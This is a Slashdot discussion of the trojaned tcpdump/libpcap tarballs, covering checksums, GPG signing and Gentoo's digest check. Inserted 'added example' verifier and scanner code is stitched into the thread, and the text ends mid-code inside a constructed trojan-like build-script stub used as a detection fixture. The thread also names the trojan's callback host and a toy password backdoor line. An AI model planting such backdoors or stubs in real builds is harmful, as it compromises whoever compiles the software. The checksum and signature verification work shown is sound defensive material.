      BTW, most corporations aren't worth a thimble of salt. Corners get cut, marketing makes insane deadlines, laziness and sloppiness abound. It is even worse now that more companies have 24 hour broadband access piped to the same PC that houses development work. People just don't think, and management only cares about the bottom line and department politics.

      Windows: "Go talk to my friend, an 800 pound monopoly-abusing gorilla!"
      Mac: "And here's my good buddy, the 66,000 ton Godzilla!"
      Godzilla: Stomp! ;)

    30. Re:Eventually, this would happen by John+Hasler · · Score: 2

      > Well, that's why you have peer review, software
      > test engineers (that test for security, not just
      > breaking bugs).

      How do you know that your closed source vendor has that? Do you take the salesman's word?

      > ...but there's no guarantee of the competence of
      > those eyes.

      No, but the large number makes it likely that at least one set will be competent. Where's the guarantee with closed source?

      --
      Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
    31. Re:Eventually, this would happen by swv3752 · · Score: 2

      It surely does mean that it was possible. What's the level at which you are willing to bet that this wasn't done? that's what I thought.

      --
      Just a Tuna in the Sea of Life
    32. Re:Eventually, this would happen by sheldon · · Score: 2

      But it doesn't necessarily mean it was probable.

    33. Re:Eventually, this would happen by shatfield · · Score: 2

      Wow, someone had a blue screen this morning!

      You obviously didn't read the article. Microsoft does this OUTSIDE of the "cookies and caching" system... this is a HIDDEN FROM THE USER source that Microsoft can pull from to get every page that you've visited, every URL you typed, etc.

      If Linus were to do this, Alan Cox would quickly become the defacto Linux kernel developer.. with Uncle Bill in control of the corporations that we work for, we don't have that luxury.

      --
      "To make a mistake is only human; to persist in a mistake is idiotic." Cicero
    34. Re:Eventually, this would happen by dvdeug · · Score: 2

      The reality is I don't have time to find these trojans, so I expect a company to do it internally.

      How do you know the programmers aren't the ones who put the trojan there? There's a number of trojans, especially backdoors, put there by the programmer. (Remember WarGames?) IIRC, Borland Database had a backdoor added in '95 that was revealed when it was open sourced in 2000.

    35. Re:Eventually, this would happen by tshak · · Score: 2

      Where's the guarantee that your car is designed to last 250,000 miles? Sure, you can open the hood, but you (nor any individual) can determine the quality of the design simply by opening the hood. You look at a Company's track record. When Honda has proven itself by building cars that last long with minimal maintenance, that's how you know. This is the same with airplanes, or any other engineered product. It's ludicrous to assume that the blueprints for a 747 need to be "open" so that we can ensure that there's no bugs in the GPS computer (for example).

      --

      There is no longer anything that can be done with computers that is nontrivial and clearly legal. -- Paul Phillips
    36. Re:Eventually, this would happen by tshak · · Score: 2

      Remember WarGames?

      Yes, I own that _MOVIE_ (case in point).

      --

      There is no longer anything that can be done with computers that is nontrivial and clearly legal. -- Paul Phillips
    37. Re:Eventually, this would happen by dvdeug · · Score: 2

      I own that _MOVIE_ (case in point).

      It was a parenthetical comment, and followed by a real-life case. As far as I can tell, WarGames was one of the most accurate theatrical portrayals of hacking ever.

    38. Re:Eventually, this would happen by evilpenguin · · Score: 3, Informative

      It should be easy to find this person. The trojan downloads evil code from a specific web site. This site is either the perps or was cracked by the perp. They will be hunted down.

      There is virtually no way to be absolutely certain of the integrity of any code, unless you audit it yourself. Even fans of OpenBSD have to admit that they are trusting the OpenBSD auditors. Some would use this to argue that you can place greater trust in closed code. But, to use Microsoft as an example (but not to claim that they are the administrator of all evil), the infamous Word macro virus first appeared on a Microsoft beta release and I seem to recall a story a little over a year ago about Russian hackers having spent a few merry weeks in the Windows 2000 source code. Trust now?

      The point is that we all use code on faith. Even should Palladium become reality, you are just transferring trust to another party. The lesson I think we in the Free Software community should take away from this is that we should make better use of the tools we have. We should provide GPG signed MD5 checksums of all of our "official" tarballs. Some projects do this, some do not. As I just pointed out, this is not a guarantee, but it does provide a chain of accountability.

    39. Re:Eventually, this would happen by yem · · Score: 2

      Last time I checked, GCC source tarballs STILL aren't signed, despite this being brought to the maintainer's attention. The perception that MD5 sums are sufficient is extremely common.

      Trojaned gcc, anyone?

      --
      No, I did not read the f***ing article!
    40. Re:Eventually, this would happen by tshak · · Score: 2

      and followed by a real-life case.

      A case which does not substantiate that the flaw had anything to do with the nature of "closed source" software - maybe Borland just had a poor code review process, or maybe it didn't happen at all and it was a rumour.

      WarGames was one of the most accurate theatrical portrayals of hacking ever.

      I'm not sure whether to mod this +5 Funny or -1 Clueless. I really hope you were joking.

      --

      There is no longer anything that can be done with computers that is nontrivial and clearly legal. -- Paul Phillips
    41. Re:Eventually, this would happen by dvdeug · · Score: 3, Insightful

      A case which does not substantiate that the flaw had anything to do with the nature of "closed source" software

      Within a few months of the code being open sourced, the back door was found. It stayed in closed source code for six years. Whether or not Borland could have done things to find it is irrelevant - they didn't and I bet many other vendors work the same way.

      it was a rumour.

      I guess it's easier to accuse me of spreading rumors than to enter "Borland database backdoor" into google and get stuff like a ZDNet article detailing the history of the bug or the CERT vulnerability note.

      WarGames was one of the most accurate theatrical portrayals of hacking ever.

      I'm not sure whether to mod this +5 Funny or -1 Clueless. I really hope you were joking.

      Why? He didn't fly through a 3d-cyberspace, nor did he jump through 5 layers of military-grade security in a couple minutes. He didn't have access to anything and everything controlled by computer.

      He snagged the password to the teacher's computer off a Post-it note, and dug up information on the programmer of WOPR to take guesses at what the password might be, both of which are real hacking tools. He used hardware that existed and that he could realistically own. He wardialed, a habit of real hackers. I can't think of any other movie that comes close.

      There are minor plot-necessary exaggerations -- no, WOPR wouldn't have an outside line to it, and yes, the cops would have been at the door long before he got in -- but they don't mar the fact that it was fundamentally right.

    42. Re:Eventually, this would happen by coaxial · · Score: 2

      I downloaded libpcap/0.7.1 from tcpdump.org on September 2 of this year (just 2 months ago), and it was not trojaned (I keep a record of md5 sums, and was able to check this just now).

      You do realize of course that MD5s only provide limited security. After all, if I can replace the .tar.gz, why can't I also replace the .md5?

    43. Re:Eventually, this would happen by Bruce+Perens · · Score: 2
      I'm not sure I agree with you about the semantics of virus vs. trojan. Please call me at the phone number on my web site to discuss this, if you wish to continue the argument.

      Thanks

      Bruce

    44. Re:Eventually, this would happen by MarkusQ · · Score: 2

      What a nit. You say riddled and yet you can only name one supposed inconsistency which really is not and it is not even apropos to the question at hand.

      I, on the other hand, would maintain that it is to the point. It was a clear example of the sort of emotional (as opposed to rational) argument you were offering. In particular, your heated tone implies sharp distinctions that all but vanish when examined a little more calmly. They are (I would argue) an artifact not of what you are saying but of how you are saying it. For example, from your last post:

      Put bluntly, if you wish to hold up viruses as an example of the frequency of "trojans" in closed source software, then you should make a strong distinction between the virus' very generic attacks and the often far more dangerous and subtle trojan attacks of humans on specific code and installations.

      • Stripped of all the heat/emotional language, your statement boils down to: "to use viruses as example of trojans you should distinguish virus attacks and trojan attacks." In other words, if I want to say "A is an example of B" I should say "A is not B"--which is not a valid statement about categorical inclusion.
      • Even if it was true in general, it wouldn't apply in this case since "trojan" is a means of acting ("trojan" code is code that lies hidden inside a seemingly innocent program, and therefore is executed by an unsuspecting user) while "virus" is a means of propagation ("virus" code is code that spreads by using the resources of infected machines to make copies of itself). To put them in opposition is as silly as contrasting "things that swim" with "things that lay eggs".
      • If I try to guess what your real point is, the best I can come up with is "viruses are easier to detect than trojans, because you can spot them by looking at the binaries instead of digging through the source". While this sounds a little more reasonable on the surface, it is also flawed. Yes, it is easy to spot a virus by comparing an infected binary with an uninfected binary (if you know which one is which). But it would be just as easy to detect a trojaned program by comparing it to an untrojaned copy (again, assuming that one was labeled "suspected" and the other was labeled "known good").
      • As for contrasting open source and closed source (which seems to be the main axe you are grinding), the advantage of open source is that, in the case where you don't have a "known good" copy, it is much easier to find suspicious code by looking at the source than by looking at the binary.

      -- MarkusQ

    45. Re:Eventually, this would happen by whereiswaldo · · Score: 2

      You do realize of course that MD5s only provide limited security. After all, if I can replace the .tar.gz, why can't I also replace the .md5?

      Presumably, the md5sum file was also md5sum'd.

    46. Re:Eventually, this would happen by Random+Walk · · Score: 2
      Unfortunately, almost nobody cares to verify signatures. And exactly nobody ever tries to verify the signature key.

      And worst of all, gpg has no option that would enforce checking the signature on signed data, or at least would make it difficult to access them without checking the signature.

    47. Re:Eventually, this would happen by FallLine · · Score: 2
      I, on the other hand, would maintain that it is to the point. It was a clear example of the sort of emotional (as opposed to rational) argument you were offering. In particular, your heated tone implies sharp distinctions that all but vanish when examined a little more calmly. They are (I would argue) an artifact not of what you are saying but of how you are saying it.
      There was nothing emotional in my post. I challenge you to list something that was emotional. What's more, even if you will assert that there was a scintilla of emotion in it, you completely ignored the bulk of the argument in favor of some niggardly point, despite the fact that the meaning (and even arguably phrasing) was very clear. Lastly, you were the ones that came forth with the ad hominem attacks. Pot Kettle Black.

      I said:

      Put bluntly, if you wish to hold up viruses as an example of the frequency of "trojans" in closed source software, then you should make a strong distinction between the virus' very generic attacks and the often far more dangerous and subtle trojan attacks of humans on specific code and installations.

      That was a very clear statement, yet you spewed:

      Stripped of all the heat/emotional language, your statement boils down to: "to use viruses as example of trojans you should distinguish virus attacks and trojan attacks." In other words, if I want to say "A is an example of B" I should say "A is not B"--which is not a valid statement about categorical inclusion.
      Wrong. That is not what I said. What I said, in essence, is that, although viruses are a subset of trojans [which they are: according to the popular definition; according to your hero's post in this thread; and especially according to the stricter definition of the Jargon File], for the purpose of this discussion, an argument concerning the relative resistance against trojaning of open source vs closed source, you should make a distinction between the capabilities of the generic virus (e.g., stick this destructive code to destroy all files at the end of every executable) and that of the purposely coded human trojan (e.g., transfer every 100th transaction into my bank account). In other words, while you might technically be able to say that both are trojans equally well, ignoring the difference in the context of this discussion is disingenuous.

      Even if it was true in general, it wouldn't apply in this case since "trojan" is a means of acting ("trojan" code is code that lies hidden inside a seemingly innocent program, and therefore is executed by an unsuspecting user) while "virus" is a means of propagation ("virus" code is code that spreads by using the resources of infected machines to make copies of itself). To put them in opposition is as silly as contrasting "things that swim" with "things that lay eggs".
      More of the same nonsense. Again, I did not say that.

      If I try to guess what your real point is, the best I can come up with is "viruses are easier to detect than trojans, because you can spot them by looking at the binaries instead of digging through the source". While this sounds a little more reasonable on the surface, it is also flawed. Yes, it is easy to spot a virus by comparing an infected binary with an uninfected binary (if you know which one is which). But it would be just as easy to detect a trojaned program by comparing it to an untrojaned copy (again, assuming that one was labeled "suspected" and the other was labeled "known good").
      No, this is not what I was referring to either. Perhaps your trouble is simply your shallow understanding of the structure of the various executable files and the limitations on what any program can do, barring some major advances in AI, versus that of a human's creativity. You are not going to see a virus that can selectively go into any program and do something specific to that program itself like, say, transferring every 5th charge to my bank account. In other words, the fact that viruses can spread successfully is a result of the fact that they limit themselves to the trivial appending of code and other such non-specific attacks. Outside of those easily detectable sorts of attacks, a closed source binary is far far harder to trojan.

      As for contrasting open source and closed source (which seems to be the main axe you are grinding), the advantage of open source is that, in the case where you don't have a "known good" copy) it is much easier to find suspicious code by looking at the source than by looking at the binary.
      I disagree. It is easier to formulate an attack than it is a defence. While you are empowered to more easily look for bugs and backdoors in the code with the availability of source code, you are also put in a position where thousands of people can even more easily insert their own malicious code (completely ignoring the fact that few people in the real world do or even have the time). The bad guys only need to inject a couple lines of code, but you need to fully understand what each and every line does and that is far less trivial. Open source auditors may easily detect code such as if strcmp(passwd,"l33tpass") backdoor(); but the backdoor may consist of infinitely more subtle attacks. For instance, the hacker may introduce a hard to reproduce buffer overflow vulnerability, without using one of the many known insecure functions, especially in places that people are unlikely to be looking at intensely. Besides the fact that these open source development efforts generally involve more programmers, rather than a select few, and therefore increase the exposure to "bad" people, the risks do not end when the distribution is finalized. When you have open source code you make it easier for any hacker that may happen to intercept the code in transit, so to speak. When you have open source code, you make it easier to create a backdoor in the system for a hacker... and so on. In short, if you are going to claim that open source is easier to validate, then you should also admit that it at least makes it easier to write malicious code for, both because you can trivially add code in a high level fashion and because your ability to understand the fundamentals of the program is greater (e.g., you don't have to reverse engineer file formats).
  5. Seems by jamesjw · · Score: 2, Informative


    Seems now more than ever the need to check the authenticity of your sources before installing.

    As if security auditing wasn't a big enough headache already :(

    --
    -- If at first you don't succeed, lie!
    1. Re:Seems by Marx_Mrvelous · · Score: 2, Redundant

      You mean you don't check the checksum before you install software now? There's a reason that they provide the md5 for the compressed code!

      --

      Moderation: Put your hand inside the puppet head!
    2. Re:Seems by paranoos · · Score: 5, Insightful

      If some malicious coder could upload manipulated software, do you not think they could also spoof the MD5 sum also? From what I've seen, the checksum is usually just stored in a text file in the same directory.

    3. Re:Seems by fitten · · Score: 2, Insightful

      md5sum doesn't guarantee anything other than saying that the version you downloaded was the one that the author/host put out there for you to download (and not someone else's). If the author/host put a trojan in it, the md5sum will be for the trojan'd software.

      In the end, it still comes down to whether or not you (can) trust the author/host.

    4. Re:Seems by a_n_d_e_r_s · · Score: 2

      Actually, the MD5 hash has been used to find at least one earlier case. They didn't update the MD5 and someone got suspicious when it did not match.

      --
      Just saying it like it are.
    5. Re:Seems by schlach · · Score: 2


      No, he's right. There's usually just an md5 file stored in the same directory, and it is the dumbest thing in the world. The system would work if everyone just signed their damn md5 file, and their public key was available on a different server, say the web server, emails, public key root servers, etc. etc. Why don't they do this? I dunno, next time you see a distro this way, write the admin and ask them.

    6. Re:Seems by harlows_monkeys · · Score: 2
      Normally a md5 checksum is stored in a different server... or at least it should be

      But is it normally a different server running a different operating system and a different web/ftp server, administered by different people?

      If not, then there's no reason to trust it any more than the the server with the trojan.

    7. Re:Seems by mjh · · Score: 2
      Thanks to Antioffline.com for hosting us, and Gentoo's Portage system for catching the trojaned files via checksums.

      This was caught by the gentoo portage system. The gentoo portage system distributes a number of "ebuilds". Each one of those contains (amongst many other pieces of info) the MD5 for the downloaded source file.

      To get this exploit past gentoo, you would have had to compromise the tcpdump.org site AND compromise the gentoo mirror which held the ebuild.

      I'm a debian user who has tinkered with gentoo. This is a very impressive win for gentoo. Way to go, gentoo.

      --
      Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
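      The mechanism mjh describes, as an added example that is not code from Gentoo, Portage, or any poster in this thread: a small Go program that parses a digest file in the `MD5 <hash> <filename> <size>` layout Portage used, verifies a tarball against it, and contrasts a digest fetched from an independent mirror with one sitting beside the tarball on the compromised server. The tarball bytes, the "injected code" suffix and the use of tcpdump-3.7.1.tar.gz as a label are constructed stand-ins; the function names are my own.

```go
package main

import (
	"bufio"
	"crypto/md5"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"strconv"
	"strings"
)

// DigestEntry is one line of a Portage-style digest file:
//   MD5 <hex md5> <filename> <size in bytes>
// (SHA256 is accepted too, so the same checker works with a stronger hash.)
type DigestEntry struct {
	Algo string
	Hex  string
	Name string
	Size int64
}

// ParseDigest parses digest text into entries keyed by filename.
func ParseDigest(text string) (map[string]DigestEntry, error) {
	out := map[string]DigestEntry{}
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		f := strings.Fields(line)
		if len(f) != 4 {
			return nil, fmt.Errorf("malformed digest line: %q", line)
		}
		size, err := strconv.ParseInt(f[3], 10, 64)
		if err != nil {
			return nil, fmt.Errorf("bad size in digest line %q: %v", line, err)
		}
		out[f[2]] = DigestEntry{Algo: strings.ToUpper(f[0]), Hex: strings.ToLower(f[1]), Name: f[2], Size: size}
	}
	return out, sc.Err()
}

// FormatDigestLine is what the ebuild maintainer runs over the clean tarball
// (and what an attacker runs over the trojaned one to forge a co-located .md5).
func FormatDigestLine(name string, data []byte) string {
	h := md5.Sum(data)
	return fmt.Sprintf("MD5 %s %s %d", hex.EncodeToString(h[:]), name, len(data))
}

// VerifyTarball checks size first (cheap), then the recorded hash.
func VerifyTarball(name string, data []byte, digest map[string]DigestEntry) error {
	e, ok := digest[name]
	if !ok {
		return fmt.Errorf("%s: no digest entry", name)
	}
	if int64(len(data)) != e.Size {
		return fmt.Errorf("%s: size %d, digest says %d", name, len(data), e.Size)
	}
	var sum string
	switch e.Algo {
	case "MD5":
		h := md5.Sum(data)
		sum = hex.EncodeToString(h[:])
	case "SHA256":
		h := sha256.Sum256(data)
		sum = hex.EncodeToString(h[:])
	default:
		return fmt.Errorf("%s: unsupported algorithm %s", name, e.Algo)
	}
	if sum != e.Hex {
		return fmt.Errorf("%s: %s mismatch: got %s, digest says %s", name, e.Algo, sum, e.Hex)
	}
	return nil
}

func main() {
	const name = "tcpdump-3.7.1.tar.gz" // label only; the bytes below are constructed
	clean := []byte("constructed stand-in for the clean tarball")
	trojaned := append(append([]byte{}, clean...), []byte(" plus injected code")...)

	// The ebuild's digest was computed from the clean tarball and is served
	// from the distro mirror, not from the server that was broken into.
	ebuildDigest, _ := ParseDigest(FormatDigestLine(name, clean))

	// The attacker who replaced the tarball also rewrote the .md5 next to it.
	colocatedDigest, _ := ParseDigest(FormatDigestLine(name, trojaned))

	fmt.Println("co-located .md5 check:", VerifyTarball(name, trojaned, colocatedDigest)) // <nil>: passes, proves nothing
	fmt.Println("ebuild digest check:  ", VerifyTarball(name, trojaned, ebuildDigest))    // mismatch: caught
}
```

      The two checks run the same code; what differs is where the digest came from. That is the whole of the "second server" argument made elsewhere in this thread: a checksum is only as trustworthy as the least-trusted host it was copied from.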
  6. This Trojan thing... by Big+Mark · · Score: 2, Interesting

    It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get access to _any_ unix system.

    It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.

    Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...

    1. Re:This Trojan thing... by JamesO · · Score: 5, Informative

      It's Denis Ritchie

      And he only might have done it (can you tell?)

      See http://www.acm.org/classics/sep95/ for more details

    2. Re:This Trojan thing... by F2F · · Score: 5, Informative

      It's Ken Thompson. How do I know? His name is right beneath the title of the article you linked.

  7. Ewww by segfault7375 · · Score: 2, Funny


    Trojan Found in libpcap and tcpdump

    I swear, some of these source trees are worse than the canals of Venice. :)

  8. MD5 checksums by Zayin · · Score: 4, Insightful

    Use them.

    --
    "I'd rather have a full bottle in front of me than a full frontal lobotomy"
    1. Re:MD5 checksums by diamondc · · Score: 5, Insightful

      if someone breaks into an ftp server, they might as well replace the md5 signatures, too. a better solution would be signing the sources with a gpg key.

      --
      "I keep looking in the want-ads under 'revolutionary' but there don't seem to be any listings.. "
    2. Re:MD5 checksums by AccUser · · Score: 2, Interesting

      That's good if you can assure that the MD5 checksum is for the original tarball. What if the guy who placed the trojan placed a new MD5 checksum as well?

      --

      Any fool can talk, but it takes a wise man to listen.

    3. Re:MD5 checksums by KjetilK · · Score: 3, Interesting
      ....and replace the GPG signatures with keys that just have the same name and address. If there are two keys with the same name and address, which one would you trust?

      We need to come together and paaaaaarty! :-)

      Really, that's the only solution to this problem. Probably, this is something we are going to see more frequently, so frequently perhaps that it may undermine the free software community's credibility. Therefore, we must come together and meet, and exchange signatures, so that at least we can ensure that the software is signed by its maintainer.

      Now, go and get registered at Biglumber, sign up to the keysignings list and start organizing keysigning parties. Also, make sure that you meet other hackers when you're out travelling.

      --
      Employee of Inrupt, Project Release Manager and Community Manager for Solid
    4. Re:MD5 checksums by Sloppy · · Score: 2
      A matching MD5 is equivalent to this:

      "This file is safe." -- Anonymous Coward

      Do you trust Anonymous Coward?

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    5. Re:MD5 checksums by ReelOddeeo · · Score: 2

      If there are two keys with the same name and address, which one would you trust?

      At least you should be suspicious.

      --

      Those who would give up liberty in exchange for security and DRM should switch to Microsoft Palladium!
    6. Re:MD5 checksums by KjetilK · · Score: 2

      If there are 2 different signatures for the same source, this is a red flag that one of them has been altered. Thus the audit begins, and thus the backdoor is found.

      Or people think: "oh, the author has generated a new key" and move along without considering the alternative. This isn't really strong enough.

      --
      Employee of Inrupt, Project Release Manager and Community Manager for Solid
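The digest line quoted from the Gentoo ebuild at the top of this thread (MD5 plus file size) is what actually caught the replaced tarball, and the replies above explain why that worked: the digest lived in the portage tree, not on the mirror that was rewritten. Below is an added example, not from the thread and not Gentoo's portage code, that parses that digest format and checks a downloaded file against it; every tarball, hash and filename in it is constructed.

```python
import hashlib
import hmac

# Digest format as quoted from the Gentoo ebuild in this thread:
#   MD5 <hex digest> <filename> <size in bytes>
# All sample data below is constructed; the hashes are computed here from the
# constructed bytes, not taken from any real tcpdump release.

# The pristine tarball as the distribution maintainer saw it when the digest
# was generated (constructed stand-in for tcpdump-3.7.1.tar.gz).
CLEAN_TARBALL = b"tcpdump-3.7.1/configure: checking for libpcap... yes\n" * 8

# Same length, last four bytes changed: a replaced file that a size check
# alone would wave through.
TROJANED_TARBALL = CLEAN_TARBALL[:-4] + b"no!\n"

# A replaced file that also grew, so the cheaper size check already fails.
PADDED_TARBALL = CLEAN_TARBALL + b"# extra build step\n"


def make_digest_line(name, data, algo="md5"):
    """Produce one digest line from a file the maintainer has vetted."""
    return f"{algo.upper()} {hashlib.new(algo, data).hexdigest()} {name} {len(data)}"


# Constructed digest file, generated from the pristine tarball only. In the
# real incident this lived in the portage tree, out of the attacker's reach.
DIGEST_FILE = "\n".join([
    "# constructed digest, in the format the ebuild digest uses",
    make_digest_line("tcpdump-3.7.1.tar.gz", CLEAN_TARBALL),
]) + "\n"


def parse_digest(text):
    """Parse digest lines into {filename: (algo, hexdigest, size)}."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != 4:
            raise ValueError(f"malformed digest line: {line!r}")
        algo, hexdigest, name, size = parts
        entries[name] = (algo.lower(), hexdigest.lower(), int(size))
    return entries


def verify_file(name, data, entries):
    """Check downloaded bytes against the digest; return (ok, reason)."""
    if name not in entries:
        return False, "no digest entry"
    algo, expected, size = entries[name]
    # Size first: cheap, and it already rejects crude replacements.
    if len(data) != size:
        return False, f"size mismatch: expected {size}, got {len(data)}"
    try:
        digest = hashlib.new(algo)
    except ValueError:
        return False, f"unsupported algorithm {algo}"
    digest.update(data)
    actual = digest.hexdigest()
    if not hmac.compare_digest(actual, expected):
        return False, f"{algo} mismatch: expected {expected}, got {actual}"
    return True, "ok"


if __name__ == "__main__":
    entries = parse_digest(DIGEST_FILE)
    for label, blob in (("clean", CLEAN_TARBALL),
                        ("trojaned", TROJANED_TARBALL),
                        ("padded", PADDED_TARBALL)):
        print(label, verify_file("tcpdump-3.7.1.tar.gz", blob, entries))
```

The check is only as trustworthy as the channel the digest arrived over; a digest served from the same compromised mirror would have been rewritten along with the tarball, which is why the thread keeps coming back to signatures.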
  9. mars.raketti.net by solostring · · Score: 3, Interesting

    The program connects to 212.146.0.34 (mars.raketti.net) on port 1963

    With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?

    1. Re:mars.raketti.net by Draoi · · Score: 2

      Chances are, it's some other hapless admin's r00ted box .....

      --
      Alison

      "It is a miracle that curiosity survives formal education." - Albert Einstein

  10. This is a growing trend by Anonymous Coward · · Score: 2, Interesting

    This never used to happen. Now it is like as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.

  11. That's not a problem, that's a feature by Anonymous Coward · · Score: 2, Insightful

    there's no-one to pay me to pay my staff for the lost man-hours caused by this.
    But then again, you had to pay no-one for the man hours you saved by using the open-source code.

  12. Re:This is dreadful by vadim_t · · Score: 2, Informative

    Excuse me if I sound disrespectful, but that makes me really doubt your skills. MD4? First, usually what's used is MD5, second it's just a hash and doesn't ensure the file hasn't been tampered with. All you need is to run md5sum on the patched file.

    Now, good GPG signatures would have helped.

  13. Security getting worse? by Noryungi · · Score: 2

    ... or are script kiddies getting better?

    Seriously, though, I think the ideal solution would be to do multiple checks of the RC5 signature of newest packages, over several mirrors. The advisory mentioned that tcpdump.org was compromised, while the mirror at ibiblio.org was OK.

    Or use Gentoo Linux. Of course. I can't do that, since I don't have broadband at home... =(

    --
    The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
  14. One too many? by simpleguy · · Score: 4, Insightful

    Isn't this one too many?

    There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?

    Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors. Or maybe there is a *VERY NASTY* exploit circulating privately?

    At least that's what I think.

    1. Re:One too many? by LostCluster · · Score: 5, Insightful

      As Linux becomes more popular, the dumber system admins who never patched their Windows systems now have Linux systems. All it takes is a small handful of people to not know there is a wide-open back door, or worse yet know but be too lazy to take the corrective action, and there's enough zombies to cause headaches.

    2. Re:One too many? by Hard_Code · · Score: 2

      Aha...there's the bug, now let me just recompile the daemon against libpcap...uh, wait...

      --

      It's 10 PM. Do you know if you're un-American?
    3. Re:One too many? by ei4anb · · Score: 3, Informative
      www.netcraft.com says www.tcpdump.org uses OpenSSL/0.9.5a

      http://www.openssl.org/news/secadv_20020730.txt says that is vulnerable.

      Everyone using OpenSSL 0.9.6d or earlier, or 0.9.7-beta2 or earlier or current development snapshots of 0.9.7 to provide SSL or TLS is vulnerable, whether client or server.
    4. Re:One too many? by alexandre · · Score: 2

      There always is a private exploit circulating ... that's the problem.

    5. Re:One too many? by Mandi+Walls · · Score: 2
      Unless their OS vendor produces patches without incrementing to a new version of SSL.

      Why would they do this? 'cause the OpenSSL apis keep changing and the vendor saw that patching an older ssl version was easier than rebuilding and pushing errata for every freaking package that uses SSL.

      0.9.5a is still updated by Red Hat, for example, on 7.0 because it is required for python 1.5.2, which is required for more packages than i care to list here. (including up2date, which gets you such fancy updates from Red Hat)

      However, 0.9.5a is patchable to a safe level, it's most recent build date for 7.0 being August 1.

      Now, if they're not running vendor-provided patches on a production server, then they have a lot of faith in their sysadmin to have a lot of time to sit and compile new software everytime a patch becomes available. Which, being that netcraft also says they're running a BSD, maybe they are just that crazy. :)

      --mandi

    6. Re:One too many? by Jeppe+Salvesen · · Score: 3, Informative

      Or maybe there is a *VERY NASTY* exploit circulating privately? This is why the people who set up honeynets and dissect the scans are our heroes. They would hopefully detect unknown exploits in software, just by looking at the fingerprint of the attack and figuring out if it is already known.

      That being said, that alone is not enough. Everyone should run their updates nightly, and make sure their security doesn't collapse completely once one box has been taken.

      However, I would like to take the opportunity to applaud the honeynet people who actively act like sitting ducks in order to protect the rest of us.

      --

      Stop the brainwash

    7. Re:One too many? by supabeast! · · Score: 2

      Even better, does anyone think that there are a ton of poorly-defended systems out there where l33t hax0rs can replace popular programs with their own, and the only people who find out are open source geeks?

      For example, what would happen if someone hacked the Symantec Anti-Virus FTP, replaced the intelligent updater with a trojan, hacked the HTTP server and stuck up a matching md5sum, and then waited until monday for thousands of admins to download the latest version and install it? How long would it take for someone to find out?

      Even worse, would anyone ever even find out?

    8. Re:One too many? by arkanes · · Score: 2

      I don't know for sure, but I would generally assume that people who write security oriented software like OpenSSH and tcpdump would maintain updated, secured servers.

    9. Re:One too many? by cascadefx · · Score: 2
      You do realize that you are talking about the maintainers of libpcap and tcpdump. I wouldn't think that they are slouches in the Linux department. Apache got hacked a while back as well. Theirs was because of a combination of policy issues and a hacked server on the network that one of their maintainers was using to connect to the site. I bet we will find something similar in all of these problems.

      Remember kids: Your computer may be safe, but the computer you connect from may be a skeezy gutter snipe. If you have to use someone else's computer use a Linux bootable CD with ssh and stunnel. If you are on a foreign network, pack that laptop and use those tools.

    10. Re:One too many? by HiThere · · Score: 2

      Everyone should run their updates nightly, and ...

      That's a bit of a dangerous piece of advice. Correcting problems is good. Periodic updates opens you to the next infection. The only people, e.g., affected by this trojan are those who updated the affected applications while it was out there. But if everyone updated every night, something like this could hit everyone at once.

      --

      I think we've pushed this "anyone can grow up to be president" thing too far.
    11. Re:One too many? by Jeppe+Salvesen · · Score: 2

      I trust Red Hat packages and Red Hat network. It is much too high profile for them to allow it to be hacked and then used to distribute trojan'ed software.

      --

      Stop the brainwash

  15. Re:This is dreadful by jimand · · Score: 5, Insightful

    there's no-one to pay me to pay my staff for the lost man-hours caused by this

    Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.

  16. cleaning? by mr.+marbles · · Score: 3

    so seeing as how there's no trojan cleaning program in linux, how does a person infected with the trojan rid his system of it? is it as simple as installing the non-trojan version?

    1. Re:cleaning? by Megane · · Score: 2
      From looking at the diffs, the trojans seem to be in the build scripts, not the binaries. The modification to the source code was simply to provide an obfuscated way to pass the port number back to the trojaned build scripts.

      I guess that's the clever part... you only activate the trojan if you recompile from source!

      --
      #naabhaprzrag, #sverubfr-000, #agi-fcbafberq, negvpyr[pynff*=' negvpyr-ary-'] { qvfcynl: abar !vzcbegnag; }
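Megane's observation points at where to look: the trojan lived in the generated build script, written out as a small C program with cat. Autoconf configure scripts legitimately write and compile dozens of such probe programs, so a useful check has to look at what an embedded program does, not just that one exists. The following is an added example, not from the thread, that pulls the cat-heredoc program bodies out of a configure script and flags any that combine several behaviours no feature probe needs (daemonizing, dialling out to a literal address, executing commands); the sample script and its 192.0.2.10 address are constructed.

```python
import re

# Constructed sample of a generated configure script. The first embedded
# program is an ordinary autoconf feature probe; the second is a constructed
# stand-in for the kind of program the thread describes being smuggled into
# the build scripts. 192.0.2.10 is a documentation (TEST-NET-1) placeholder.
SAMPLE_CONFIGURE = """\
#!/bin/sh
echo "checking for socket"
cat >conftest.c <<EOF
#include <sys/socket.h>
int main (void) { return socket (AF_INET, SOCK_STREAM, 0) < 0; }
EOF
$CC conftest.c >/dev/null 2>&1
echo "checking for inet_addr"
cat >conftest.c <<EOF
#include <arpa/inet.h>
#include <unistd.h>
int main (void)
{
  switch (fork ()) { case 0: break; default: exit (1); }
  close (0); close (1); close (2);
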